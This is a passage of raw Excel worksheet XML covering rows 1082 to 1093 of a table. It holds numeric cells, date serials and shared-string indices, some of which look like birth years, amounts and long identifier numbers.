        <v>24</v>
      </c>
      <c r="AJ1082">
        <v>369</v>
      </c>
      <c r="AK1082" t="s">
        <v>5736</v>
      </c>
      <c r="AL1082" t="s">
        <v>8179</v>
      </c>
      <c r="AM1082" t="s">
        <v>8180</v>
      </c>
      <c r="AN1082" t="s">
        <v>68</v>
      </c>
      <c r="AO1082">
        <v>2019</v>
      </c>
      <c r="AP1082">
        <v>81381548156</v>
      </c>
      <c r="AQ1082">
        <v>81381548156</v>
      </c>
      <c r="AR1082" t="s">
        <v>5739</v>
      </c>
      <c r="AS1082" t="s">
        <v>179</v>
      </c>
      <c r="AT1082" t="s">
        <v>72</v>
      </c>
      <c r="AU1082">
        <v>6</v>
      </c>
      <c r="AV1082">
        <v>0</v>
      </c>
      <c r="AW1082">
        <v>8</v>
      </c>
      <c r="AX1082">
        <v>2</v>
      </c>
      <c r="AY1082">
        <v>8</v>
      </c>
      <c r="AZ1082">
        <v>4</v>
      </c>
      <c r="BA1082" t="s">
        <v>17596</v>
      </c>
      <c r="BB1082">
        <v>0</v>
      </c>
      <c r="BC1082" t="s">
        <v>12611</v>
      </c>
      <c r="BD1082" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1083" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1083">
        <v>2813</v>
      </c>
      <c r="B1083" t="s">
        <v>8181</v>
      </c>
      <c r="C1083" t="s">
        <v>3717</v>
      </c>
      <c r="D1083" t="s">
        <v>8182</v>
      </c>
      <c r="E1083" t="s">
        <v>142</v>
      </c>
      <c r="F1083" t="s">
        <v>8183</v>
      </c>
      <c r="G1083" s="1">
        <v>44172</v>
      </c>
      <c r="H1083">
        <v>7673</v>
      </c>
      <c r="I1083">
        <v>7673</v>
      </c>
      <c r="J1083">
        <v>11</v>
      </c>
      <c r="K1083">
        <v>0</v>
      </c>
      <c r="L1083">
        <v>0</v>
      </c>
      <c r="M1083">
        <v>0</v>
      </c>
      <c r="N1083">
        <v>300</v>
      </c>
      <c r="O1083">
        <v>0</v>
      </c>
      <c r="P1083">
        <v>0</v>
      </c>
      <c r="Q1083">
        <v>2</v>
      </c>
      <c r="R1083">
        <v>2</v>
      </c>
      <c r="S1083">
        <v>0</v>
      </c>
      <c r="T1083">
        <v>1</v>
      </c>
      <c r="U1083">
        <v>400000</v>
      </c>
      <c r="V1083">
        <v>0</v>
      </c>
      <c r="W1083">
        <v>0</v>
      </c>
      <c r="X1083">
        <v>0</v>
      </c>
      <c r="Y1083">
        <v>0</v>
      </c>
      <c r="Z1083">
        <v>0</v>
      </c>
      <c r="AA1083">
        <v>0</v>
      </c>
      <c r="AB1083">
        <v>30000</v>
      </c>
      <c r="AC1083">
        <v>30000</v>
      </c>
      <c r="AD1083">
        <v>0</v>
      </c>
      <c r="AE1083">
        <v>1000</v>
      </c>
      <c r="AF1083" t="s">
        <v>8184</v>
      </c>
      <c r="AG1083">
        <v>38221</v>
      </c>
      <c r="AH1083">
        <v>8</v>
      </c>
      <c r="AJ1083">
        <v>125</v>
      </c>
      <c r="AK1083" t="s">
        <v>3808</v>
      </c>
      <c r="AL1083" t="s">
        <v>8185</v>
      </c>
      <c r="AM1083" t="s">
        <v>8186</v>
      </c>
      <c r="AN1083" t="s">
        <v>68</v>
      </c>
      <c r="AO1083">
        <v>2007</v>
      </c>
      <c r="AP1083">
        <v>85378913434</v>
      </c>
      <c r="AQ1083" t="s">
        <v>8187</v>
      </c>
      <c r="AR1083" t="s">
        <v>8184</v>
      </c>
      <c r="AS1083" t="s">
        <v>71</v>
      </c>
      <c r="AT1083" t="s">
        <v>72</v>
      </c>
      <c r="AU1083">
        <v>30</v>
      </c>
      <c r="AV1083">
        <v>0</v>
      </c>
      <c r="AW1083">
        <v>10</v>
      </c>
      <c r="AX1083">
        <v>0</v>
      </c>
      <c r="AY1083">
        <v>4</v>
      </c>
      <c r="AZ1083">
        <v>0</v>
      </c>
      <c r="BA1083" t="s">
        <v>17346</v>
      </c>
      <c r="BB1083">
        <v>0</v>
      </c>
      <c r="BC1083">
        <v>0</v>
      </c>
      <c r="BD1083">
        <v>0</v>
      </c>
    </row>
    <row r="1084" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1084">
        <v>5155</v>
      </c>
      <c r="B1084" t="s">
        <v>8188</v>
      </c>
      <c r="C1084" t="s">
        <v>74</v>
      </c>
      <c r="D1084" t="s">
        <v>8189</v>
      </c>
      <c r="E1084" t="s">
        <v>916</v>
      </c>
      <c r="F1084" t="s">
        <v>8190</v>
      </c>
      <c r="G1084" s="1">
        <v>44270</v>
      </c>
      <c r="H1084">
        <v>7709</v>
      </c>
      <c r="I1084">
        <v>7709</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t="s">
        <v>8191</v>
      </c>
      <c r="AG1084">
        <v>59161</v>
      </c>
      <c r="AH1084">
        <v>14</v>
      </c>
      <c r="AJ1084">
        <v>205</v>
      </c>
      <c r="AK1084" t="s">
        <v>8192</v>
      </c>
      <c r="AL1084" t="s">
        <v>8193</v>
      </c>
      <c r="AM1084" t="s">
        <v>8194</v>
      </c>
      <c r="AN1084" t="s">
        <v>55</v>
      </c>
      <c r="AO1084">
        <v>2020</v>
      </c>
      <c r="AP1084" t="s">
        <v>8195</v>
      </c>
      <c r="AQ1084" t="s">
        <v>8196</v>
      </c>
      <c r="AR1084" t="s">
        <v>8197</v>
      </c>
      <c r="AS1084" t="s">
        <v>71</v>
      </c>
      <c r="AT1084" t="s">
        <v>58</v>
      </c>
      <c r="AU1084">
        <v>26</v>
      </c>
      <c r="AV1084">
        <v>1</v>
      </c>
      <c r="AW1084">
        <v>4</v>
      </c>
      <c r="AX1084">
        <v>8</v>
      </c>
      <c r="AY1084">
        <v>1</v>
      </c>
      <c r="AZ1084">
        <v>1</v>
      </c>
      <c r="BA1084" t="s">
        <v>17607</v>
      </c>
      <c r="BB1084">
        <v>0</v>
      </c>
      <c r="BC1084">
        <v>0</v>
      </c>
      <c r="BD1084" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1085" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1085">
        <v>2821</v>
      </c>
      <c r="B1085" t="s">
        <v>6047</v>
      </c>
      <c r="C1085" t="s">
        <v>99</v>
      </c>
      <c r="D1085" t="s">
        <v>8198</v>
      </c>
      <c r="E1085" t="s">
        <v>111</v>
      </c>
      <c r="F1085" t="s">
        <v>8199</v>
      </c>
      <c r="G1085" s="1">
        <v>44207</v>
      </c>
      <c r="H1085">
        <v>7769</v>
      </c>
      <c r="I1085">
        <v>7769</v>
      </c>
      <c r="J1085">
        <v>1</v>
      </c>
      <c r="K1085">
        <v>1</v>
      </c>
      <c r="L1085">
        <v>0</v>
      </c>
      <c r="M1085">
        <v>0</v>
      </c>
      <c r="N1085">
        <v>0</v>
      </c>
      <c r="O1085">
        <v>0</v>
      </c>
      <c r="P1085">
        <v>0</v>
      </c>
      <c r="Q1085">
        <v>0</v>
      </c>
      <c r="R1085">
        <v>0</v>
      </c>
      <c r="S1085">
        <v>0</v>
      </c>
      <c r="T1085">
        <v>0</v>
      </c>
      <c r="U1085">
        <v>300000</v>
      </c>
      <c r="V1085">
        <v>200000</v>
      </c>
      <c r="W1085">
        <v>0</v>
      </c>
      <c r="X1085">
        <v>0</v>
      </c>
      <c r="Y1085">
        <v>0</v>
      </c>
      <c r="Z1085">
        <v>0</v>
      </c>
      <c r="AA1085">
        <v>0</v>
      </c>
      <c r="AB1085">
        <v>0</v>
      </c>
      <c r="AC1085">
        <v>0</v>
      </c>
      <c r="AD1085">
        <v>0</v>
      </c>
      <c r="AE1085">
        <v>0</v>
      </c>
      <c r="AF1085" t="s">
        <v>6050</v>
      </c>
      <c r="AG1085">
        <v>13430</v>
      </c>
      <c r="AH1085">
        <v>12</v>
      </c>
      <c r="AJ1085">
        <v>157</v>
      </c>
      <c r="AK1085" t="s">
        <v>2147</v>
      </c>
      <c r="AL1085" t="s">
        <v>2148</v>
      </c>
      <c r="AM1085" t="s">
        <v>8200</v>
      </c>
      <c r="AN1085" t="s">
        <v>55</v>
      </c>
      <c r="AO1085">
        <v>1982</v>
      </c>
      <c r="AP1085" t="s">
        <v>6054</v>
      </c>
      <c r="AQ1085" t="s">
        <v>6055</v>
      </c>
      <c r="AR1085" t="s">
        <v>8201</v>
      </c>
      <c r="AS1085" t="s">
        <v>179</v>
      </c>
      <c r="AT1085" t="s">
        <v>58</v>
      </c>
      <c r="AU1085">
        <v>24</v>
      </c>
      <c r="AV1085">
        <v>2</v>
      </c>
      <c r="AW1085">
        <v>0</v>
      </c>
      <c r="AX1085">
        <v>0</v>
      </c>
      <c r="AY1085">
        <v>12</v>
      </c>
      <c r="AZ1085">
        <v>0</v>
      </c>
      <c r="BA1085" t="s">
        <v>16635</v>
      </c>
      <c r="BB1085" t="s">
        <v>15929</v>
      </c>
      <c r="BC1085" t="s">
        <v>12731</v>
      </c>
      <c r="BD1085">
        <v>0</v>
      </c>
    </row>
    <row r="1086" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1086">
        <v>5159</v>
      </c>
      <c r="B1086" t="s">
        <v>8202</v>
      </c>
      <c r="C1086" t="s">
        <v>318</v>
      </c>
      <c r="D1086" t="s">
        <v>8203</v>
      </c>
      <c r="E1086" t="s">
        <v>363</v>
      </c>
      <c r="F1086" t="s">
        <v>364</v>
      </c>
      <c r="G1086" s="1">
        <v>44305</v>
      </c>
      <c r="H1086">
        <v>7818</v>
      </c>
      <c r="I1086">
        <v>7818</v>
      </c>
      <c r="J1086">
        <v>1</v>
      </c>
      <c r="K1086">
        <v>0</v>
      </c>
      <c r="L1086">
        <v>0</v>
      </c>
      <c r="M1086">
        <v>0</v>
      </c>
      <c r="N1086">
        <v>0</v>
      </c>
      <c r="O1086">
        <v>0</v>
      </c>
      <c r="P1086">
        <v>0</v>
      </c>
      <c r="Q1086">
        <v>0</v>
      </c>
      <c r="R1086">
        <v>0</v>
      </c>
      <c r="S1086">
        <v>0</v>
      </c>
      <c r="T1086">
        <v>1</v>
      </c>
      <c r="U1086">
        <v>100000</v>
      </c>
      <c r="V1086">
        <v>0</v>
      </c>
      <c r="W1086">
        <v>0</v>
      </c>
      <c r="X1086">
        <v>0</v>
      </c>
      <c r="Y1086">
        <v>0</v>
      </c>
      <c r="Z1086">
        <v>0</v>
      </c>
      <c r="AA1086">
        <v>0</v>
      </c>
      <c r="AB1086">
        <v>0</v>
      </c>
      <c r="AC1086">
        <v>0</v>
      </c>
      <c r="AD1086">
        <v>0</v>
      </c>
      <c r="AE1086">
        <v>100000</v>
      </c>
      <c r="AF1086" t="s">
        <v>8204</v>
      </c>
      <c r="AG1086">
        <v>90241</v>
      </c>
      <c r="AH1086">
        <v>26</v>
      </c>
      <c r="AJ1086">
        <v>420</v>
      </c>
      <c r="AK1086" t="s">
        <v>936</v>
      </c>
      <c r="AL1086" t="s">
        <v>937</v>
      </c>
      <c r="AM1086" t="s">
        <v>8205</v>
      </c>
      <c r="AN1086" t="s">
        <v>55</v>
      </c>
      <c r="AO1086">
        <v>2019</v>
      </c>
      <c r="AP1086">
        <v>8124212000</v>
      </c>
      <c r="AQ1086" t="s">
        <v>8204</v>
      </c>
      <c r="AR1086" t="s">
        <v>8204</v>
      </c>
      <c r="AS1086" t="s">
        <v>371</v>
      </c>
      <c r="AT1086" t="s">
        <v>58</v>
      </c>
      <c r="AU1086">
        <v>20</v>
      </c>
      <c r="AV1086">
        <v>1</v>
      </c>
      <c r="AW1086">
        <v>1</v>
      </c>
      <c r="AX1086">
        <v>0</v>
      </c>
      <c r="AY1086">
        <v>1</v>
      </c>
      <c r="AZ1086">
        <v>1</v>
      </c>
      <c r="BA1086" t="s">
        <v>17610</v>
      </c>
      <c r="BB1086" t="s">
        <v>16102</v>
      </c>
      <c r="BC1086" t="s">
        <v>12673</v>
      </c>
      <c r="BD1086" t="s">
        <v>12674</v>
      </c>
    </row>
    <row r="1087" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1087">
        <v>5191</v>
      </c>
      <c r="B1087" t="s">
        <v>8206</v>
      </c>
      <c r="C1087" t="s">
        <v>168</v>
      </c>
      <c r="D1087" t="s">
        <v>8207</v>
      </c>
      <c r="E1087" t="s">
        <v>142</v>
      </c>
      <c r="F1087" t="s">
        <v>143</v>
      </c>
      <c r="G1087" s="1">
        <v>44370</v>
      </c>
      <c r="H1087">
        <v>7840</v>
      </c>
      <c r="I1087">
        <v>7840</v>
      </c>
      <c r="J1087">
        <v>4</v>
      </c>
      <c r="K1087">
        <v>3</v>
      </c>
      <c r="L1087">
        <v>1</v>
      </c>
      <c r="M1087">
        <v>0</v>
      </c>
      <c r="N1087">
        <v>0</v>
      </c>
      <c r="O1087">
        <v>0</v>
      </c>
      <c r="P1087">
        <v>0</v>
      </c>
      <c r="Q1087">
        <v>1</v>
      </c>
      <c r="R1087">
        <v>0</v>
      </c>
      <c r="S1087">
        <v>0</v>
      </c>
      <c r="T1087">
        <v>1</v>
      </c>
      <c r="U1087">
        <v>25000</v>
      </c>
      <c r="V1087">
        <v>3000</v>
      </c>
      <c r="W1087">
        <v>1000</v>
      </c>
      <c r="X1087">
        <v>0</v>
      </c>
      <c r="Y1087">
        <v>0</v>
      </c>
      <c r="Z1087">
        <v>0</v>
      </c>
      <c r="AA1087">
        <v>0</v>
      </c>
      <c r="AB1087">
        <v>1000</v>
      </c>
      <c r="AC1087">
        <v>0</v>
      </c>
      <c r="AD1087">
        <v>0</v>
      </c>
      <c r="AE1087">
        <v>6000</v>
      </c>
      <c r="AF1087" t="s">
        <v>8208</v>
      </c>
      <c r="AG1087">
        <v>17412</v>
      </c>
      <c r="AH1087">
        <v>13</v>
      </c>
      <c r="AJ1087">
        <v>183</v>
      </c>
      <c r="AK1087" t="s">
        <v>8209</v>
      </c>
      <c r="AL1087" t="s">
        <v>8210</v>
      </c>
      <c r="AM1087" t="s">
        <v>8211</v>
      </c>
      <c r="AN1087" t="s">
        <v>55</v>
      </c>
      <c r="AO1087">
        <v>1983</v>
      </c>
      <c r="AP1087" t="s">
        <v>8212</v>
      </c>
      <c r="AQ1087" t="s">
        <v>8213</v>
      </c>
      <c r="AR1087" t="s">
        <v>8214</v>
      </c>
      <c r="AS1087" t="s">
        <v>71</v>
      </c>
      <c r="AT1087" t="s">
        <v>72</v>
      </c>
      <c r="AU1087">
        <v>20</v>
      </c>
      <c r="AV1087">
        <v>1</v>
      </c>
      <c r="AW1087">
        <v>0</v>
      </c>
      <c r="AX1087">
        <v>0</v>
      </c>
      <c r="AY1087">
        <v>112</v>
      </c>
      <c r="AZ1087">
        <v>38</v>
      </c>
      <c r="BA1087" t="s">
        <v>17619</v>
      </c>
      <c r="BB1087">
        <v>0</v>
      </c>
      <c r="BC1087" t="s">
        <v>13754</v>
      </c>
      <c r="BD1087" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1088" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1088">
        <v>5183</v>
      </c>
      <c r="B1088" t="s">
        <v>4285</v>
      </c>
      <c r="C1088" t="s">
        <v>168</v>
      </c>
      <c r="D1088" t="s">
        <v>8215</v>
      </c>
      <c r="E1088" t="s">
        <v>142</v>
      </c>
      <c r="F1088" t="s">
        <v>1487</v>
      </c>
      <c r="G1088" s="1">
        <v>44222</v>
      </c>
      <c r="H1088">
        <v>7841</v>
      </c>
      <c r="I1088">
        <v>7841</v>
      </c>
      <c r="J1088">
        <v>4</v>
      </c>
      <c r="K1088">
        <v>0</v>
      </c>
      <c r="L1088">
        <v>0</v>
      </c>
      <c r="M1088">
        <v>0</v>
      </c>
      <c r="N1088">
        <v>0</v>
      </c>
      <c r="O1088">
        <v>0</v>
      </c>
      <c r="P1088">
        <v>0</v>
      </c>
      <c r="Q1088">
        <v>0</v>
      </c>
      <c r="R1088">
        <v>0</v>
      </c>
      <c r="S1088">
        <v>0</v>
      </c>
      <c r="T1088">
        <v>0</v>
      </c>
      <c r="U1088">
        <v>10000000</v>
      </c>
      <c r="V1088">
        <v>0</v>
      </c>
      <c r="W1088">
        <v>0</v>
      </c>
      <c r="X1088">
        <v>0</v>
      </c>
      <c r="Y1088">
        <v>0</v>
      </c>
      <c r="Z1088">
        <v>0</v>
      </c>
      <c r="AA1088">
        <v>0</v>
      </c>
      <c r="AB1088">
        <v>0</v>
      </c>
      <c r="AC1088">
        <v>0</v>
      </c>
      <c r="AD1088">
        <v>0</v>
      </c>
      <c r="AE1088">
        <v>0</v>
      </c>
      <c r="AF1088" t="s">
        <v>5138</v>
      </c>
      <c r="AG1088">
        <v>17152</v>
      </c>
      <c r="AH1088">
        <v>13</v>
      </c>
      <c r="AJ1088">
        <v>183</v>
      </c>
      <c r="AK1088" t="s">
        <v>8216</v>
      </c>
      <c r="AL1088" t="s">
        <v>7298</v>
      </c>
      <c r="AM1088" t="s">
        <v>8217</v>
      </c>
      <c r="AN1088" t="s">
        <v>55</v>
      </c>
      <c r="AO1088">
        <v>2009</v>
      </c>
      <c r="AP1088">
        <v>622189906706</v>
      </c>
      <c r="AQ1088" t="s">
        <v>8218</v>
      </c>
      <c r="AR1088" t="s">
        <v>5143</v>
      </c>
      <c r="AS1088" t="s">
        <v>71</v>
      </c>
      <c r="AT1088" t="s">
        <v>58</v>
      </c>
      <c r="AU1088">
        <v>26</v>
      </c>
      <c r="AV1088">
        <v>2</v>
      </c>
      <c r="AW1088">
        <v>0</v>
      </c>
      <c r="AX1088">
        <v>0</v>
      </c>
      <c r="AY1088">
        <v>20</v>
      </c>
      <c r="AZ1088">
        <v>2</v>
      </c>
      <c r="BA1088" t="s">
        <v>16638</v>
      </c>
      <c r="BB1088">
        <v>0</v>
      </c>
      <c r="BC1088" t="s">
        <v>9536</v>
      </c>
      <c r="BD1088" t="s">
        <v>12342</v>
      </c>
    </row>
    <row r="1089" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1089">
        <v>4964</v>
      </c>
      <c r="B1089" t="s">
        <v>8219</v>
      </c>
      <c r="C1089" t="s">
        <v>790</v>
      </c>
      <c r="D1089" t="s">
        <v>8220</v>
      </c>
      <c r="E1089" t="s">
        <v>142</v>
      </c>
      <c r="F1089" t="s">
        <v>8221</v>
      </c>
      <c r="G1089" s="1">
        <v>44316</v>
      </c>
      <c r="H1089">
        <v>7878</v>
      </c>
      <c r="I1089">
        <v>7878</v>
      </c>
      <c r="J1089">
        <v>1</v>
      </c>
      <c r="K1089">
        <v>2</v>
      </c>
      <c r="L1089">
        <v>0</v>
      </c>
      <c r="M1089">
        <v>0</v>
      </c>
      <c r="N1089">
        <v>0</v>
      </c>
      <c r="O1089">
        <v>0</v>
      </c>
      <c r="P1089">
        <v>0</v>
      </c>
      <c r="Q1089">
        <v>0</v>
      </c>
      <c r="R1089">
        <v>0</v>
      </c>
      <c r="S1089">
        <v>0</v>
      </c>
      <c r="T1089">
        <v>1</v>
      </c>
      <c r="U1089">
        <v>60</v>
      </c>
      <c r="V1089">
        <v>6</v>
      </c>
      <c r="W1089">
        <v>0</v>
      </c>
      <c r="X1089">
        <v>0</v>
      </c>
      <c r="Y1089">
        <v>0</v>
      </c>
      <c r="Z1089">
        <v>0</v>
      </c>
      <c r="AA1089">
        <v>0</v>
      </c>
      <c r="AB1089">
        <v>0</v>
      </c>
      <c r="AC1089">
        <v>0</v>
      </c>
      <c r="AD1089">
        <v>0</v>
      </c>
      <c r="AE1089">
        <v>5000</v>
      </c>
      <c r="AF1089" t="s">
        <v>8222</v>
      </c>
      <c r="AG1089">
        <v>93217</v>
      </c>
      <c r="AH1089">
        <v>27</v>
      </c>
      <c r="AJ1089">
        <v>438</v>
      </c>
      <c r="AK1089" t="s">
        <v>8223</v>
      </c>
      <c r="AL1089" t="s">
        <v>8224</v>
      </c>
      <c r="AM1089" t="s">
        <v>8225</v>
      </c>
      <c r="AN1089" t="s">
        <v>55</v>
      </c>
      <c r="AO1089">
        <v>1967</v>
      </c>
      <c r="AP1089">
        <v>82124335488</v>
      </c>
      <c r="AQ1089" t="s">
        <v>8226</v>
      </c>
      <c r="AR1089" t="s">
        <v>8227</v>
      </c>
      <c r="AS1089" t="s">
        <v>71</v>
      </c>
      <c r="AT1089" t="s">
        <v>58</v>
      </c>
      <c r="AU1089">
        <v>5</v>
      </c>
      <c r="AV1089">
        <v>0</v>
      </c>
      <c r="AW1089">
        <v>3</v>
      </c>
      <c r="AX1089">
        <v>34</v>
      </c>
      <c r="AY1089">
        <v>21</v>
      </c>
      <c r="AZ1089">
        <v>17</v>
      </c>
      <c r="BA1089" t="s">
        <v>16616</v>
      </c>
      <c r="BB1089" t="s">
        <v>16074</v>
      </c>
      <c r="BC1089">
        <v>0</v>
      </c>
      <c r="BD1089" t="s">
        <v>12695</v>
      </c>
    </row>
    <row r="1090" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1090">
        <v>5172</v>
      </c>
      <c r="B1090" t="s">
        <v>8228</v>
      </c>
      <c r="C1090" t="s">
        <v>74</v>
      </c>
      <c r="D1090" t="s">
        <v>8229</v>
      </c>
      <c r="E1090" t="s">
        <v>49</v>
      </c>
      <c r="F1090" t="s">
        <v>8230</v>
      </c>
      <c r="G1090" s="1">
        <v>44216</v>
      </c>
      <c r="H1090">
        <v>7918</v>
      </c>
      <c r="I1090">
        <v>7918</v>
      </c>
      <c r="J1090">
        <v>1</v>
      </c>
      <c r="K1090">
        <v>0</v>
      </c>
      <c r="L1090">
        <v>0</v>
      </c>
      <c r="M1090">
        <v>2</v>
      </c>
      <c r="N1090">
        <v>0</v>
      </c>
      <c r="O1090">
        <v>0</v>
      </c>
      <c r="P1090">
        <v>0</v>
      </c>
      <c r="Q1090">
        <v>1</v>
      </c>
      <c r="R1090">
        <v>1</v>
      </c>
      <c r="S1090">
        <v>0</v>
      </c>
      <c r="T1090">
        <v>0</v>
      </c>
      <c r="U1090">
        <v>200</v>
      </c>
      <c r="V1090">
        <v>0</v>
      </c>
      <c r="W1090">
        <v>0</v>
      </c>
      <c r="X1090">
        <v>200</v>
      </c>
      <c r="Y1090">
        <v>0</v>
      </c>
      <c r="Z1090">
        <v>0</v>
      </c>
      <c r="AA1090">
        <v>0</v>
      </c>
      <c r="AB1090">
        <v>100</v>
      </c>
      <c r="AC1090">
        <v>100</v>
      </c>
      <c r="AD1090">
        <v>0</v>
      </c>
      <c r="AE1090">
        <v>0</v>
      </c>
      <c r="AF1090" t="s">
        <v>8231</v>
      </c>
      <c r="AG1090">
        <v>50141</v>
      </c>
      <c r="AH1090">
        <v>14</v>
      </c>
      <c r="AJ1090">
        <v>220</v>
      </c>
      <c r="AK1090" t="s">
        <v>8232</v>
      </c>
      <c r="AL1090" t="s">
        <v>8233</v>
      </c>
      <c r="AM1090" t="s">
        <v>8234</v>
      </c>
      <c r="AN1090" t="s">
        <v>68</v>
      </c>
      <c r="AO1090">
        <v>1997</v>
      </c>
      <c r="AP1090">
        <v>81390948222</v>
      </c>
      <c r="AQ1090" t="s">
        <v>8235</v>
      </c>
      <c r="AR1090" t="s">
        <v>8231</v>
      </c>
      <c r="AS1090" t="s">
        <v>71</v>
      </c>
      <c r="AT1090" t="s">
        <v>72</v>
      </c>
      <c r="AU1090">
        <v>7</v>
      </c>
      <c r="AV1090">
        <v>0</v>
      </c>
      <c r="AW1090">
        <v>1</v>
      </c>
      <c r="AX1090">
        <v>4</v>
      </c>
      <c r="AY1090">
        <v>1</v>
      </c>
      <c r="AZ1090">
        <v>4</v>
      </c>
      <c r="BA1090" t="s">
        <v>17614</v>
      </c>
      <c r="BB1090" t="s">
        <v>16103</v>
      </c>
      <c r="BC1090" t="s">
        <v>9485</v>
      </c>
      <c r="BD1090">
        <v>0</v>
      </c>
    </row>
    <row r="1091" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1091">
        <v>5190</v>
      </c>
      <c r="B1091" t="s">
        <v>8236</v>
      </c>
      <c r="C1091" t="s">
        <v>790</v>
      </c>
      <c r="D1091" t="s">
        <v>8237</v>
      </c>
      <c r="E1091" t="s">
        <v>142</v>
      </c>
      <c r="F1091" t="s">
        <v>666</v>
      </c>
      <c r="G1091" s="1">
        <v>44358</v>
      </c>
      <c r="H1091">
        <v>7932</v>
      </c>
      <c r="I1091">
        <v>7932</v>
      </c>
      <c r="J1091">
        <v>1</v>
      </c>
      <c r="K1091">
        <v>0</v>
      </c>
      <c r="L1091">
        <v>4</v>
      </c>
      <c r="M1091">
        <v>1</v>
      </c>
      <c r="N1091">
        <v>0</v>
      </c>
      <c r="O1091">
        <v>0</v>
      </c>
      <c r="P1091">
        <v>0</v>
      </c>
      <c r="Q1091">
        <v>0</v>
      </c>
      <c r="R1091">
        <v>14</v>
      </c>
      <c r="S1091">
        <v>0</v>
      </c>
      <c r="T1091">
        <v>1</v>
      </c>
      <c r="U1091">
        <v>250000</v>
      </c>
      <c r="V1091">
        <v>0</v>
      </c>
      <c r="W1091">
        <v>24000</v>
      </c>
      <c r="X1091">
        <v>6000</v>
      </c>
      <c r="Y1091">
        <v>0</v>
      </c>
      <c r="Z1091">
        <v>0</v>
      </c>
      <c r="AA1091">
        <v>0</v>
      </c>
      <c r="AB1091">
        <v>0</v>
      </c>
      <c r="AC1091">
        <v>14000</v>
      </c>
      <c r="AD1091">
        <v>0</v>
      </c>
      <c r="AE1091">
        <v>20000</v>
      </c>
      <c r="AF1091" t="s">
        <v>8238</v>
      </c>
      <c r="AG1091">
        <v>93234</v>
      </c>
      <c r="AH1091">
        <v>27</v>
      </c>
      <c r="AJ1091">
        <v>438</v>
      </c>
      <c r="AK1091" t="s">
        <v>793</v>
      </c>
      <c r="AL1091" t="s">
        <v>794</v>
      </c>
      <c r="AM1091" t="s">
        <v>8239</v>
      </c>
      <c r="AN1091" t="s">
        <v>55</v>
      </c>
      <c r="AO1091">
        <v>2002</v>
      </c>
      <c r="AP1091" t="s">
        <v>8240</v>
      </c>
      <c r="AQ1091" t="s">
        <v>8241</v>
      </c>
      <c r="AR1091" t="s">
        <v>8238</v>
      </c>
      <c r="AS1091" t="s">
        <v>71</v>
      </c>
      <c r="AT1091" t="s">
        <v>58</v>
      </c>
      <c r="AU1091">
        <v>26</v>
      </c>
      <c r="AV1091">
        <v>1</v>
      </c>
      <c r="AW1091">
        <v>3</v>
      </c>
      <c r="AX1091">
        <v>2</v>
      </c>
      <c r="AY1091">
        <v>10</v>
      </c>
      <c r="AZ1091">
        <v>2</v>
      </c>
      <c r="BA1091" t="s">
        <v>17618</v>
      </c>
      <c r="BB1091">
        <v>0</v>
      </c>
      <c r="BC1091" t="s">
        <v>12703</v>
      </c>
      <c r="BD1091" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="1092" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1092">
        <v>5154</v>
      </c>
      <c r="B1092" t="s">
        <v>8242</v>
      </c>
      <c r="C1092" t="s">
        <v>74</v>
      </c>
      <c r="D1092" t="s">
        <v>8243</v>
      </c>
      <c r="E1092" t="s">
        <v>142</v>
      </c>
      <c r="F1092" t="s">
        <v>666</v>
      </c>
      <c r="G1092" s="1">
        <v>44267</v>
      </c>
      <c r="H1092">
        <v>7974</v>
      </c>
      <c r="I1092">
        <v>7974</v>
      </c>
      <c r="J1092">
        <v>3</v>
      </c>
      <c r="K1092">
        <v>0</v>
      </c>
      <c r="L1092">
        <v>0</v>
      </c>
      <c r="M1092">
        <v>0</v>
      </c>
      <c r="N1092">
        <v>0</v>
      </c>
      <c r="O1092">
        <v>0</v>
      </c>
      <c r="P1092">
        <v>0</v>
      </c>
      <c r="Q1092">
        <v>0</v>
      </c>
      <c r="R1092">
        <v>0</v>
      </c>
      <c r="S1092">
        <v>0</v>
      </c>
      <c r="T1092">
        <v>0</v>
      </c>
      <c r="U1092">
        <v>300000</v>
      </c>
      <c r="V1092">
        <v>0</v>
      </c>
      <c r="W1092">
        <v>0</v>
      </c>
      <c r="X1092">
        <v>0</v>
      </c>
      <c r="Y1092">
        <v>0</v>
      </c>
      <c r="Z1092">
        <v>0</v>
      </c>
      <c r="AA1092">
        <v>0</v>
      </c>
      <c r="AB1092">
        <v>0</v>
      </c>
      <c r="AC1092">
        <v>0</v>
      </c>
      <c r="AD1092">
        <v>0</v>
      </c>
      <c r="AE1092">
        <v>0</v>
      </c>
      <c r="AF1092" t="s">
        <v>8244</v>
      </c>
      <c r="AG1092">
        <v>59185</v>
      </c>
      <c r="AH1092">
        <v>14</v>
      </c>
      <c r="AJ1092">
        <v>205</v>
      </c>
      <c r="AK1092" t="s">
        <v>3221</v>
      </c>
      <c r="AL1092" t="s">
        <v>8245</v>
      </c>
      <c r="AM1092" t="s">
        <v>8246</v>
      </c>
      <c r="AN1092" t="s">
        <v>68</v>
      </c>
      <c r="AO1092">
        <v>2019</v>
      </c>
      <c r="AP1092">
        <v>82245551991</v>
      </c>
      <c r="AQ1092" t="s">
        <v>8247</v>
      </c>
      <c r="AR1092" t="s">
        <v>8244</v>
      </c>
      <c r="AS1092" t="s">
        <v>71</v>
      </c>
      <c r="AT1092" t="s">
        <v>72</v>
      </c>
      <c r="AU1092">
        <v>25</v>
      </c>
      <c r="AV1092">
        <v>1</v>
      </c>
      <c r="AW1092">
        <v>0</v>
      </c>
      <c r="AX1092">
        <v>0</v>
      </c>
      <c r="AY1092">
        <v>5</v>
      </c>
      <c r="AZ1092">
        <v>2</v>
      </c>
      <c r="BA1092" t="s">
        <v>17606</v>
      </c>
      <c r="BB1092" t="s">
        <v>17612</v>
      </c>
      <c r="BC1092" t="s">
        <v>9536</v>
      </c>
      <c r="BD1092">
        <v>0</v>
      </c>
    </row>
    <row r="1093" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1093">
        <v>5203</v>
      </c>
      <c r="B1093" t="s">
        <v>8248</v>
      </c>
      <c r="C1093" t="s">
